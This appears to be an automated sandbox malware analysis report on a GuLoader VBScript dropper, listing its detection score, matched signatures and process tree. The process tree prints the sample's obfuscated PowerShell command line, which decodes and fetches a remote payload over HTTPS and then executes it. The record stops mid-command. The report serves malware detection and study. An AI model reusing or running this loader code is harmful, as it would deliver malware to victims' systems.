Windows
Analysis Report
2669976595_366408723_KHI_SOF_240702_0957_P.vbs
Overview
General Information
Detection
GuLoader
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7596 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\26699 76595_3664 08723_KHI_ SOF_240702 _0957_P.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 1296 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'aflytnin gsudstyren e Sortkrid tstegninge rne myopar alysis Riv inian Undg ldes Chowt ime Anodyn ia Betonin gerne Blya ntstegning er Frydefu ld Whacker Prvekrt K endemrket Fjernsynet s Oligocar pous Hawks haws Under legenhedsf lelserne S ortspttes Boleroers Opklares K amsin Arch in intetan endes Exha ustibility aflytning sudstyrene Sortkridt stegninger ne myopara lysis Rivi nian Undgl des Chowti me Anodyni a Betoning erne Blyan tstegninge r Frydeful d Whacker Prvekrt Ke ndemrket F jernsynets Oligocarp ous Hawksh aws Underl egenhedsfl elserne So rtspttes B oleroers O pklares Ka msin Archi n intetane ndes Exhau stibility' ;If (${hos t}.Current Culture) { $reinvigor ate++;}Fun ction Reel ing($Takke nde){$Mjav ende=$Takk ende.Lengt h-$reinvig orate;$Neo cortical=' SUBsTRI';$ Neocortica l+='ng';Fo r( $kngten de=2;$kngt ende -lt $ Mjavende;$ kngtende+= 3){$aflytn ingsudstyr ene+=$Takk ende.$Neoc ortical.In voke( $kng tende, $re invigorate );}$aflytn ingsudstyr ene;}funct ion Convic tively($Mi spainted){ . ($Aabn ingstid) ( $Mispainte d);}$ligni ngs=Reelin g ' ,MHwo, ozSciColP, lKiaOv/Sh5 F..Ta0En F (SeW AiNon TcdCioB,wH ,sTe FlN K TSk Fi1.y0 Fo.C 0Ly;U . ,WStiSpn l6be4ei; , .kx u6 , 4,i;In Lor Invun: a1A c2Ag1F .Be 0,i)Af ,oG aesicKakd eo S/Sk2Ir 0Ny1Ol0Ou0 Op1Fl0Sa1K , DeFReiRe rYdeRafEso ,axOp/ u1 S2 ,1Sk.Be 0M, ';$Tri atomicity= Reeling 'I nUP s,ue S rCa-NoAOeg iefinVat a ';$Undgl des=Reelin g ' Fh At, etCep ks P :In/Dr/Sed ,lrt,iO.vS ueCh. VgVa o ,oPegBal Caee .LecF roS,m.a/M. u ecSe?B,e ,hx npDioA ,r.atLn=Po dWaoR.wS,n Gol GoS a. rd T&F,iSj dSt= P1anX SwObI.aR rDiEl,g yt AfX .8Ude ,QPuUTii.s eMaZWhQSe- FQt.rLa9P rkStkMeHRe 3PrQMuyAf6 ,a DiGos. gxSu ';$Al ytes=Reeli ng ' G>P. ';$Aabning stid=Reeli ng ',riS.e axEs ';$P roboscidif erous='Bet oningerne' ;$Frilufts menneskern e = Reelin g ' uenycI .h,ro . P% Una MpGop. nd.oa,rtOm aD.%Za\AgN SpoRenZic, hoS nHagA, eGesDrtA,i m oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hU noPr sntNs ';Convict ively (Ree ling 'Di$T igFolTuoWa b ea OlHa: ,lF u Vs h eSttTa=A ( ccSumTrdP s Ho/EncF. U$ rF .r .i ,lEuu u f VtStsSpm Dee FnSunF aeArsRokOv eGyrFan ,e .) ');Co nvictively (Reeling 'Re$.egB l ioB.bPlaP il S: R,oi mvEniN nI ni .afanFo =sp$aiUCyn TdCag.pl RdReehysNo .sysCopIrl .iSyt .( $olAIml,hy Grt Ue es S) ');Con victively (Reeling ' D,[GlNK.eK atSu.OxS S eKerKov.oi .acO e FPH eoK i,onPe t .MBaaBln ,a geleBi r U]Bl:C.: SqSste.ecK .uBarN,iPi t y BPNer eo FtF oZy cPuo Tl.n R =Dr Ca[D iNTreKrtDy .U,SMeeRec SuuFrrU ii nt IyScPB rExo.st o PcLaoQulTr TAlyBopSte L] V:Tu:, fT MlM sB, 1Y 2 u '); $Undgldes= $Rivinian[ 0];$Rengri